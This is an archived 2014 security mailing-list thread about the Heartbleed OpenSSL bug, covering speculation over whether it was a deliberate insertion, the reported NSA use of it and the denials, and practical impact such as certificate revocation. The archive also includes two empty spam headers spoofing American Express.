> > Well, they can. Doesn't mean they do. Time to get the message out
> > there: "start bloody looking at the code".
>
> And time to start building from source, examining source diffs, and
> devising one's own stress tests.

Also, this: http://www.youtube.com/watch?v=fwcl17Q0bpk

--
Regards
rysiek
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From fraud at americanexpress.com Fri Apr 11 07:54:41 2014
From: fraud at americanexpress.com (American Express)
Date: Fri, 11 Apr 2014 06:54:41 -0800
Subject: Irregular check card activity
Message-ID:

{_BODY_TEXT}
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 12644 bytes
Desc: not available
URL:

From drwho at virtadpt.net Fri Apr 11 09:56:38 2014
From: drwho at virtadpt.net (The Doctor)
Date: Fri, 11 Apr 2014 09:56:38 -0700
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <20140411031512.1B3E12280F8@palinka.tinho.net>
References: <20140411031512.1B3E12280F8@palinka.tinho.net>
Message-ID: <53481EC6.8060403@virtadpt.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/10/2014 08:15 PM, dan at geer.org wrote:

> In the meantime, tell me that gcc is so compact and well vetted
> that there is no room in it for insertions...

Some interesting research has been done recently on this very topic that might be of interest to this particular mailing list.

Oh, and cheers!

- --
The Doctor [412/724/301/703] [ZS]
Developer, Project Byzantium: http://project-byzantium.org/

PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

It's easier to get forgiveness for being wrong than forgiveness for being right.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iEYEAREKAAYFAlNIHsYACgkQO9j/K4B7F8G0fACggcCn+ngLNoKWl4oOTYcAz46v
VSYAni0ULpv7m2GBVwjbjGQl86x42YQP
=gOJ/
-----END PGP SIGNATURE-----

From drwho at virtadpt.net Fri Apr 11 10:00:03 2014
From: drwho at virtadpt.net (The Doctor)
Date: Fri, 11 Apr 2014 10:00:03 -0700
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <20140411040650.884292280F8@palinka.tinho.net>
References: <20140411040650.884292280F8@palinka.tinho.net>
Message-ID: <53481F93.7040800@virtadpt.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/10/2014 09:06 PM, dan at geer.org wrote:

> http://ieeexplore.ieee.org/xpl/login.jsp?tp=&arnumber=1565233
> Countering trusting trust through diverse double-compiling

Yep, that's it.
His proof-of-concept implementation is well worth examining.

- --
The Doctor [412/724/301/703] [ZS]
Developer, Project Byzantium: http://project-byzantium.org/

PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

It's easier to get forgiveness for being wrong than forgiveness for being right.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iEYEAREKAAYFAlNIH5MACgkQO9j/K4B7F8HtLACg1ZIlOcCeW9Kl2fV+kDxQxNT0
SxwAnjFKiOaU995Jr4vtgoC9js+2WNhw
=NinQ
-----END PGP SIGNATURE-----

From drwho at virtadpt.net Fri Apr 11 10:04:38 2014
From: drwho at virtadpt.net (The Doctor)
Date: Fri, 11 Apr 2014 10:04:38 -0700
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <149518711.83101.1397221629681.JavaMail.www@wwinf8224>
References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224>
Message-ID: <534820A6.7030408@virtadpt.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/11/2014 06:07 AM, tpb-crypto at laposte.net wrote:

> It could have been inserted into the OpenSSL repository through a
> backdoor... or why would the spies be so interested in hacking
> professors that deal with
> crypto and whose word is trusted by the masses? Like they did to a Belgian

For just that reason, perhaps? Because they're experts, the work and word of whom are trusted? That would be the first place I'd expect most people to look last.

> It may be possible that Seggelmann did his job correctly, that the
> reviewer did his job correctly, but someone unknown may have
> changed it just a little bit
> before delivery. What ya fellow coders think?
The timing of the commit in question is most interesting, indeed:

http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c5082161b02a22116ad75f822b1

...the date and time of the year when people are least likely to be sitting at their computers watching for and reviewing commits. Only better time would probably have been at 2359 hours UTC.

- --
The Doctor [412/724/301/703] [ZS]
Developer, Project Byzantium: http://project-byzantium.org/

PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

WWPMD? (What Would Paul Muad'dib Do?)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iEYEAREKAAYFAlNIIKYACgkQO9j/K4B7F8F3jwCgke6jqiBTm7DQrQrq7OyeEnD2
zEgAn155/V3TLOKjhlSI8X/gg65+gP84
=mCzP
-----END PGP SIGNATURE-----

From odinn.cyberguerrilla at riseup.net Fri Apr 11 11:28:07 2014
From: odinn.cyberguerrilla at riseup.net (Odinn Cyberguerrilla)
Date: Fri, 11 Apr 2014 11:28:07 -0700
Subject: healthcare.gov vulnerability?
In-Reply-To: <1397189112.80632.YahooMailNeo@web126202.mail.ne1.yahoo.com>
References: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> <20140411033654.1F352228100@palinka.tinho.net> <1397189112.80632.YahooMailNeo@web126202.mail.ne1.yahoo.com>
Message-ID: <96d92c945650d0626dd302288856fb05.squirrel@fruiteater.riseup.net>

Healthcare.gov used to have some very bad vulnerabilities. Some of which still are lying around in wait, but --> https://www.ssllabs.com/ssltest/index.html they've fixed it up since a while back.

However, that doesn't necessarily mean anything. One of the biggest providers, Anthem (anthem.com) fails. (servers: openroadfromanthem (cert not even valid), deploy.static.akamaitechnologies.com... 'F' grades, ssltest)

Supposedly people are getting connected to these health insurance companies through healthcare.gov ~ real reassuring, right?
>>From: "dan at geer.org"
>>To: jim bell
>>Jim,
>>And I wonder how all the tax preparation sites plus irs.gov are
>>waltzing with Heartbleed just now. April 15 is Tuesday...
>>--dan
>
> Yes, it's amazing how much security on the Internet is constructed on
> foundations of sand, 23 years (for example) after the writing of PGP.
> Organizations such as the NSA and CIA should be required to show that
> they are pulling their own weight, by discovering and fixing these kinds
> of bugs. After all, ostensibly they exist for the benefit of the
> citizenry of America, right? I would question the raison d'etre of the
> NSA if it found itself more interested in maintaining the existence of
> security bugs, than of closing them. The NSA can't claim that nobody else
> could find them or exploit them.
>
> As for my idea about healthcare.gov vulnerability: I thought of this many
> months ago, but I decided not to post it until the deadline had virtually
> expired. (Although, it wasn't like I thought I was the only one who could
> imagine such a thing!). I was amazed by the lack of discussion in the
> lamestream media about the potential vulnerabilities of people's personal
> data. But, even more obvious to me was the fact that healthcare.gov
> virtually invited people to enter false data: It refused to provide people
> information about health care plans until they had entered their own
> personal information. A person would be motivated to enter a mostly-fake
> set of data, solely for the purpose of getting access to the plans.
> And, there was a potential 'innocent reason': Systems like this might get
> 'stuck', making it difficult to correct data, and people might be tempted
> to initiate a new account, solely for the purpose of abandoning old data.
> I realized that depending on how well healthcare.gov had been written,
> a cracker with a script could upload thousands or even over a million
> accounts, presumably for the purpose of making the account-numbers look
> good.
> Jim Bell

From drwho at virtadpt.net Fri Apr 11 12:49:46 2014
From: drwho at virtadpt.net (The Doctor)
Date: Fri, 11 Apr 2014 12:49:46 -0700
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <53482E2B.4050201@cpunk.us>
References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us>
Message-ID: <5348475A.9010508@virtadpt.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/11/2014 11:02 AM, Cypher wrote:

> I agree that there is no proof that this bug was introduced on
> purpose and it might be a simple oversight (no matter what it looks
> like or could be). We have to keep in mind that one of the things
> spies do is

I think it's safe to say that all of us have made mistakes that later came back to bite us. Not all of them were as critical as Heartbleed, but neither are any of us perfect.

Additionally, a few folks are calling it the Tequila Hypothesis. Looking at it that way, the heartbeat feature really might have seemed like a good idea at the time (regardless of whether or not alcohol was actually involved).

> NSA/GCHQ. Part of the power these agencies wield is that /we'll
> likely never know/ and so we suspect...everyone. Everything.

They do.

- --
The Doctor [412/724/301/703] [ZS]
Developer, Project Byzantium: http://project-byzantium.org/

PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

"Look up! Look down! Now look at Mr. Frying Pan!"
--George Newman, _UHF_

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iEYEAREKAAYFAlNIR1oACgkQO9j/K4B7F8FppwCgokjuzqzUOvp0JVkjn6z8qTUF
REAAoKT8Q5uglU9nV9g9NyKaW031HIYv
=t3qU
-----END PGP SIGNATURE-----

From cypher at cpunk.us Fri Apr 11 11:02:19 2014
From: cypher at cpunk.us (Cypher)
Date: Fri, 11 Apr 2014 13:02:19 -0500
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <3135353.1KRi2F89Iu@lap>
References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap>
Message-ID: <53482E2B.4050201@cpunk.us>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

On 04/11/2014 12:54 PM, rysiek wrote:
> On Friday, 11 April 2014 10:04:38 The Doctor wrote:
>> The timing of the commit in question is most interesting,
>> indeed:
>>
>> http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c5082161b02a22116ad75f822b1
>>
>> ...the date and time of the year when people are least likely to
>> be sitting at their computers watching for and reviewing commits.
>> Only better time would probably have been at 2359 hours UTC.
>
> Now I love my conspiracy theories just like the next guy and I
> definitely do not take sides (I am myself quite inclined to think
> this is not entirely an honest mistake), but...
>
> ...the kind of argument you make rings a bell:
> http://en.wikipedia.org/wiki/Anthropic_bias
>
> I agree that this was the very best time for a commit so that
> nobody sees it/reviews it. Maybe this is why nobody has seen it nor
> reviewed it? As in, the very fact it is so does not prove that it
> was done at this time on purpose.

I agree that there is no proof that this bug was introduced on purpose and it might be a simple oversight (no matter what it looks like or could be). We have to keep in mind that one of the things spies do is sow suspicion and doubt - it's a powerful weapon!
All these vulnerabilities we're finding in critical software /might just be/ mistakes and oversights. Or they might be deliberate attacks by the NSA/GCHQ. Part of the power these agencies wield is that /we'll likely never know/ and so we suspect...everyone. Everything.

Cypher

- --
Want to communicate with me privately? Find my PGP public key here:
http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B
Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B

-----BEGIN PGP SIGNATURE-----
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTSC4qAAoJEFuutbL6JoJrbIYQAJCMlCI7rpWZq/yUuVFZOmpW
dO1QxMF1Gz0KA+MFBc5eiKzWsYbggY6jGfufiaWPDgV7fpmdirkz2enbEro6VFqN
kOQded5v72g+cHDJjb4xcsK3J/k+RKeOxQxrNd8XeiqxGAqLlScDos+LGeOOee1f
Dgefk/uQ1g/8O3sYz+uQhTyRWy+oEfSr1WUCvPYO1MiQcGt2BSC3S5RxMNKyj1XG
so+pIKtrMJq842Rxl8OBJEAHpK7o4AnN9ealHpa6o+4nUR8C4WrN+T+rwnvpuZOI
ujfWO6bEMfmGtNxOiZY3FfiJTLILrD4Ebiy28sJp6FkT53Kvvh7Bk4jdB5HJFSBh
T4RzsOE5dEcGKIUrkA1W0Ct+SxZY167rFpKKzG4D95onN4EDHkZANm+bq24NxMf7
oB2rm6F1WCb5T2IRFzUiMln0brNGmp1jM9Y4jHRvc7Nsk+X9Xrq0lGoMKiWXqa2j
XWQvgdQe3xPods/HRrEThHOJf9zg3YoxdeLmCJvUm459nHjiswOFSEobuYhbroFz
Gx9fNyQxy2V2rCY8Yl7vE8qXp6L0S8pylZdeveyXrcKUc4jL3FOKYkEm5Exm9Rmg
teI+NvbmUsO8AdEV3v70gvT6pjZr62gxWOjkbRX4LIHIq3eTZJ9+XyrVRGiLx+YU
RNu3H/lUDe49yCmtd6O1
=8cIX
-----END PGP SIGNATURE-----

From gfoster at entersection.org Fri Apr 11 12:33:41 2014
From: gfoster at entersection.org (Gregory Foster)
Date: Fri, 11 Apr 2014 14:33:41 -0500
Subject: NSA alleged to have known & used Heartbleed for 2 years
Message-ID: <53484395.9090208@entersection.org>

Bloomberg (Apr 11) - "NSA Said to Have Used Heartbleed Bug, Exposing Consumers":
http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html

> The U.S.
> National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.

gf

--
Gregory Foster || gfoster at entersection.org
@gregoryfoster <> http://entersection.com/

From cathalgarvey at cathalgarvey.me Fri Apr 11 06:37:11 2014
From: cathalgarvey at cathalgarvey.me (Cathal Garvey (Phone))
Date: Fri, 11 Apr 2014 14:37:11 +0100
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <149518711.83101.1397221629681.JavaMail.www@wwinf8224>
References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224>
Message-ID:

It'd be hard to hide an insertion if the devs all dig into the hashes of commits of their own local repos and compare, right? Even a broken hash would require changing input, so they could go an extra step and verify each commit using another hash algo, if they were feeling super-paranoid.

I'm still on the fence: this is the kind of error C is infamous for after all.

On 11 April 2014 14:07:09 GMT+01:00, tpb-crypto at laposte.net wrote:
>> Message of 11/04/14 05:44
>> From: dan at geer.org
>> > It makes me wonder if the NSA was involved in inserting this bug into
>> > OpenSSL clients and servers.
>>
>> If they did it, someone got a promotion. If they are as surprised
>> as you are, someone got fired.
>>
>> In the meantime, tell me that gcc is so compact and well vetted that
>> there is no room in it for insertions...
>>
>
>This article makes an interesting point, we got to dig a bit more from
>our pockets:
>
>http://www.wired.com/2014/04/heartbleedslesson/
>
>The second point I wish to make is the surprise by which the original
>developer took the issue. Maybe, just maybe, he did not create that
>flaw at all.
>
>It could have been inserted into the OpenSSL repository through a
>backdoor ... or why would the spies be so interested in hacking
>professors that deal with crypto and whose word is trusted by the
>masses? Like they did to a Belgian cryptographer? Was that fellow nerd
>a turrist of sorts?
>
>It may be possible that Seggelmann did his job correctly, that the
>reviewer did his job correctly, but someone unknown may have changed it
>just a little bit before delivery.
>
>
>Besides funding projects like OpenSSL better, we should start
>considering the security of the repositories themselves.
>
>What ya fellow coders think?

--
Sent from my Android device with K-9 Mail. Please excuse my brevity.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2496 bytes
Desc: not available
URL:

From tpb-crypto at laposte.net Fri Apr 11 06:07:09 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Fri, 11 Apr 2014 15:07:09 +0200
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <20140411031512.1B3E12280F8@palinka.tinho.net>
References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net>
Message-ID: <149518711.83101.1397221629681.JavaMail.www@wwinf8224>

> Message of 11/04/14 05:44
> From: dan at geer.org
> > It makes me wonder if the NSA was involved in inserting this bug into
> > OpenSSL clients and servers.
>
> If they did it, someone got a promotion. If they are as surprised
> as you are, someone got fired.
>
> In the meantime, tell me that gcc is so compact and well vetted that
> there is no room in it for insertions...
>

This article makes an interesting point, we got to dig a bit more from our pockets:

http://www.wired.com/2014/04/heartbleedslesson/

The second point I wish to make is the surprise by which the original developer took the issue. Maybe, just maybe, he did not create that flaw at all.
It could have been inserted into the OpenSSL repository through a backdoor ... or why would the spies be so interested in hacking professors that deal with crypto and whose word is trusted by the masses? Like they did to a Belgian cryptographer? Was that fellow nerd a turrist of sorts?

It may be possible that Seggelmann did his job correctly, that the reviewer did his job correctly, but someone unknown may have changed it just a little bit before delivery.

Besides funding projects like OpenSSL better, we should start considering the security of the repositories themselves.

What ya fellow coders think?

From adi at hexapodia.org Fri Apr 11 15:44:19 2014
From: adi at hexapodia.org (Andy Isaacson)
Date: Fri, 11 Apr 2014 15:44:19 -0700
Subject: NSA alleged to have known & used Heartbleed for 2 years
In-Reply-To:
References: <53484395.9090208@entersection.org> <53485E00.5050500@entersection.org>
Message-ID: <20140411224419.GL18407@hexapodia.org>

On Fri, Apr 11, 2014 at 06:13:04PM -0400, grarpamp wrote:
> > Denials:
> > https://twitter.com/NSA_PAO/status/454720059156754434
> > https://twitter.com/csoghoian/status/454725375332192256
>
> Uncharacteristically little weasel room in the pao link.

The only weasel room I can see is if the exploitation capabilities are in DoD Cyber Command, rather than NSA.

-andy

From gfoster at entersection.org Fri Apr 11 14:26:35 2014
From: gfoster at entersection.org (Gregory Foster)
Date: Fri, 11 Apr 2014 16:26:35 -0500
Subject: NSA alleged to have known & used Heartbleed for 2 years
In-Reply-To: <53484395.9090208@entersection.org>
References: <53484395.9090208@entersection.org>
Message-ID: <53485E00.5050500@entersection.org>

On 4/11/14, 2:33 PM, Gregory Foster wrote:
> Bloomberg (Apr 11) - "NSA Said to Have Used Heartbleed Bug, Exposing
> Consumers":
> http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html
>
>> The U.S.
>> National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.

Denials:
https://twitter.com/NSA_PAO/status/454720059156754434
https://twitter.com/csoghoian/status/454725375332192256

I couldn't find the primary source for the White House NSC statement Christopher posted. The "Vulnerabilities Equities Process" used to ascertain whether or not to report 0-days sounds FOIA-worthy.

gf

--
Gregory Foster || gfoster at entersection.org
@gregoryfoster <> http://entersection.com/

From guninski at guninski.com Fri Apr 11 06:32:44 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Fri, 11 Apr 2014 16:32:44 +0300
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <149518711.83101.1397221629681.JavaMail.www@wwinf8224>
References: <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224>
Message-ID: <20140411133240.GA16269@sivokote.iziade.m$>

On Fri, Apr 11, 2014 at 03:07:09PM +0200, tpb-crypto at laposte.net wrote:
> > Message of 11/04/14 05:44
> > From: dan at geer.org
> > > It makes me wonder if the NSA was involved in inserting this bug into
> > > OpenSSL clients and servers.
> >
> > If they did it, someone got a promotion. If they are as surprised
> > as you are, someone got fired.
> >
> > In the meantime, tell me that gcc is so compact and well vetted that
> > there is no room in it for insertions...
> >
>
> This article makes an interesting point, we got to dig a bit more from our pockets:
>
> http://www.wired.com/2014/04/heartbleedslesson/
>
> The second point I wish to make is the surprise by which the original developer took the issue. Maybe, just maybe, he did not create that flaw at all.
>
> It could have been inserted into the OpenSSL repository through a backdoor ...
> or why would the spies be so interested in hacking professors that deal with crypto and whose word is trusted by the masses? Like they did to a Belgian cryptographer? Was that fellow nerd a turrist of sorts?
>
> It may be possible that Seggelmann did his job correctly, that the reviewer did his job correctly, but someone unknown may have changed it just a little bit before delivery.
>
>
> Besides funding projects like OpenSSL better, we should start considering the security of the repositories themselves.
>
> What ya fellow coders think?

I certainly don't trust repositories ;)

btw, I think this heartbleed story is
exaggerated. If it were code execution
it would have been much worse.

browser vendors fix _a lot_ of
"unspecified memory hazards" every few
months.

IMO getting owned by a browser bug is
much more likely than by heartbleed.

Is there a significant rise of revoked certs caused
by HB paranoia?

From rysiek at hackerspace.pl Fri Apr 11 07:43:03 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Fri, 11 Apr 2014 16:43:03 +0200
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <20140411133240.GA16269@sivokote.iziade.m$>
References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$>
Message-ID: <1409607.uUXFrpi0Wi@lap>

On Friday, 11 April 2014 16:32:44 Georgi Guninski wrote:
> On Fri, Apr 11, 2014 at 03:07:09PM +0200, tpb-crypto at laposte.net wrote:
> > > Message of 11/04/14 05:44
> > > From: dan at geer.org
> > >
> > > > It makes me wonder if the NSA was involved in inserting this bug into
> > > > OpenSSL clients and servers.
> > >
> > > If they did it, someone got a promotion. If they are as surprised
> > > as you are, someone got fired.
> > >
> > > In the meantime, tell me that gcc is so compact and well vetted that
> > > there is no room in it for insertions...
> > >
> > This article makes an interesting point, we got to dig a bit more from our
> > pockets:
> >
> > http://www.wired.com/2014/04/heartbleedslesson/
> >
> > The second point I wish to make is the surprise by which the original
> > developer took the issue. Maybe, just maybe, he did not create that flaw
> > at all.
> >
> > It could have been inserted into the OpenSSL repository through a backdoor
> > ... or why would the spies be so interested in hacking professors that
> > deal with crypto and whose word is trusted by the masses? Like they did
> > to a Belgian cryptographer? Was that fellow nerd a turrist of sorts?
> >
> > It may be possible that Seggelmann did his job correctly, that the reviewer
> > did his job correctly, but someone unknown may have changed it just a
> > little bit before delivery.
> >
> >
> > Besides funding projects like OpenSSL better, we should start considering
> > the security of the repositories themselves.
> >
> > What ya fellow coders think?
>
> I certainly don't trust repositories ;)
>
> btw, I think this heartbleed story is
> exaggerated. If it were code execution
> it would have been much worse.
>
> browser vendors fix _a lot_ of
> "unspecified memory hazards" every few
> months.
>
> IMO getting owned by a browser bug is
> much more likely than by heartbleed.

How do you get owned by a browser bug on a server?

I mean, HB is huge, because:
 - it affects servers;
 - potentially allows access to private keys and passwords;
 - this, in case of forward-secrecy-less setups allows the bad guys to decrypt all saved traffic.

It's as bad as any root-level remote exploit on a server. And because, you know, "everybody uses OpenSSL", and because it was unknown but in the code for 2+ years, the attack surface was (and is) huge.

> Is there a significant rise of revoked certs caused
> by HB paranoia?

No idea, but we're considering revoking ours.

--
Regards
rysiek
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL:

From tpb-crypto at laposte.net Fri Apr 11 08:06:56 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 11 Apr 2014 17:06:56 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224> Message-ID: <897399326.23701.1397228816179.JavaMail.www@wwinf8313> > Message of 11/04/14 15:38 > From : "Cathal Garvey (Phone)" > It'd be hard to hide an insertion if the devs all dig into the hashes of commits of their own local repos and compare, right? Even a broken hash would require changing input, so they could go an extra step and verify each commit using another hash algo, if they were feeling super-paranoid. > > I'm still on the fence: this is the kind of error C is infamous for after all. > Right, it is highly unlikely but not impossible, maybe the devs have copies and are digging through it. Which also won't exclude that Seggelmann's PC itself was hacked into and the code modified after he e-mailed someone about having his job concluded and was delivering the goods. Considering that the tinfoilers were right all along during an entire decade, I'm also on the fence with this.

From grarpamp at gmail.com Fri Apr 11 15:13:04 2014 From: grarpamp at gmail.com (grarpamp) Date: Fri, 11 Apr 2014 18:13:04 -0400 Subject: NSA alleged to have known & used Heartbleed for 2 years In-Reply-To: <53485E00.5050500@entersection.org> References: <53484395.9090208@entersection.org> <53485E00.5050500@entersection.org> Message-ID: On Fri, Apr 11, 2014 at 5:26 PM, Gregory Foster wrote: >> http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html >>> The U.S.
National Security Agency knew for at least two years > Denials: > https://twitter.com/NSA_PAO/status/454720059156754434 > https://twitter.com/csoghoian/status/454725375332192256 Uncharacteristically little weasel room in the pao link. > I couldn't find the primary source for the White House NSC statement > Christopher posted. The "Vulnerabilities Equities Process" used to > ascertain whether or not to report 0-days sounds FOIA-worthy. They mention first knowledge in April but... Note the create date (at MITRE, ahem) in the second link. And packets (whether attributable to, or perhaps reasonably thought to be capable of detection, classification, and later use by a large and capable monitoring net) in the third link. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 https://www.eff.org/deeplinks/2014/04/wild-heart-were-intelligence-agencies-using-heartbleed-november-2013 From fraud at americanexpress.com Fri Apr 11 10:24:57 2014 From: fraud at americanexpress.com (American Express) Date: Fri, 11 Apr 2014 18:24:57 +0100 Subject: Irregular card activity Message-ID: A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12545 bytes Desc: not available URL: From guninski at guninski.com Fri Apr 11 08:34:01 2014 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 11 Apr 2014 18:34:01 +0300 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1409607.uUXFrpi0Wi@lap> References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$> <1409607.uUXFrpi0Wi@lap> Message-ID: <20140411153401.GB16269@sivokote.iziade.m$> On Fri, Apr 11, 2014 at 04:43:03PM +0200, rysiek wrote: > > How do you get owned by a browser bug on a server? 
I mean, HB is huge, > because: Own the admin or something like this (probably doesn't work for all admins, check the ACLU snowden docs for how NSA targets admins via browser bugs). > - it affects servers; > - potentially allows access to private keys and passwords; > - this, in case of forward-secrecy-less setups allows the bad guys to > decrypt all saved traffic. > > It's as bad as any root-level remote exploit on a server. And because, you Disagree. AFAICT it doesn't affect openssh, only TLS. remote preauth openssh would be fun, though ;) > know, "everybody uses OpenSSL", and because it was unknown but in the code for > 2+ years, the attack surface was (and is) huge. > Continue to believe that much more info is stolen via client bugs U buggy CMS/cgi + privilege escalation (see kernel changelogs). > > Is there a significant rise of revoked certs caused > > by HB paranoia? > > No idea, but we're considering revoking ours. > This is sound, suspect you are in the minority. Most people don't reinstall even after full ownage. -- cheers

From juan.g71 at gmail.com Fri Apr 11 14:44:09 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Fri, 11 Apr 2014 18:44:09 -0300 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <2304065.KDyk0d8uBL@lap> References: <2853647.cGAsq4hNKP@lap> <53471455.9010801@loom.cc> <2304065.KDyk0d8uBL@lap> Message-ID: --On Friday, April 11, 2014 1:10 AM +0200 rysiek wrote: > On Thursday, 10 April 2014 17:59:49 Patrick Chkoreff wrote: >> rysiek wrote, On 04/10/2014 04:08 PM: >> > On Thursday, 10 April 2014 16:26:46 Juan Garofalo wrote: >> >> --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp >> >> >> >> >> >> Oh. And what about the constant babbling stating that open source >> >> is oh-so-great security-wise because lots of people can look at >> >> the code bla bla bla bla bla. Bla! >> > >> > Well, they can. Doesn't mean they do.
Time to get the message out >> > there: "start bloody looking at the code". >> >> And time to start building from source, examining source diffs, and >> devising one's own stress tests. > > Also, this: > http://www.youtube.com/watch?v=fwcl17Q0bpk Ha! Very good =) > > -- > Regards > rysiek

From grarpamp at gmail.com Fri Apr 11 15:48:11 2014 From: grarpamp at gmail.com (grarpamp) Date: Fri, 11 Apr 2014 18:48:11 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224> Message-ID: On Fri, Apr 11, 2014 at 9:37 AM, Cathal Garvey (Phone) wrote: > It'd be hard to hide an insertion if the devs all dig into the hashes of > commits of their own local repos and compare, right? Even a broken hash > would require changing input, so they could go an extra step and verify each > commit using another hash algo, if they were feeling super-paranoid. The detection would often occur with a scrub type of routine maintenance check or automatically depending on the system. And unfortunately there are many critical repos that essentially refuse to move to a revcontrol system that employs signable hashes/merkle such that a cracked repo or even bitrot could be detected. Often out of such non claims [1] as workflow and effort to switch. FreeBSD is an example of such a key repo. http://www.git-scm.com/ http://www.git-scm.com/about/distributed [1] Considering potential the core-outwards architectural integrity benefits, among others. >> This article makes an interesting point, we got to dig a bit more from our >> pockets: >> >> http://www.wired.com/2014/04/heartbleedslesson/ >> >> The second point I wish to make is the surprise by which the original >> developer took the issue. Maybe, just maybe, he did not create that flaw >> at all. >> >> It could have been inserted into the OpenSSL repository through a backdoor >> ...
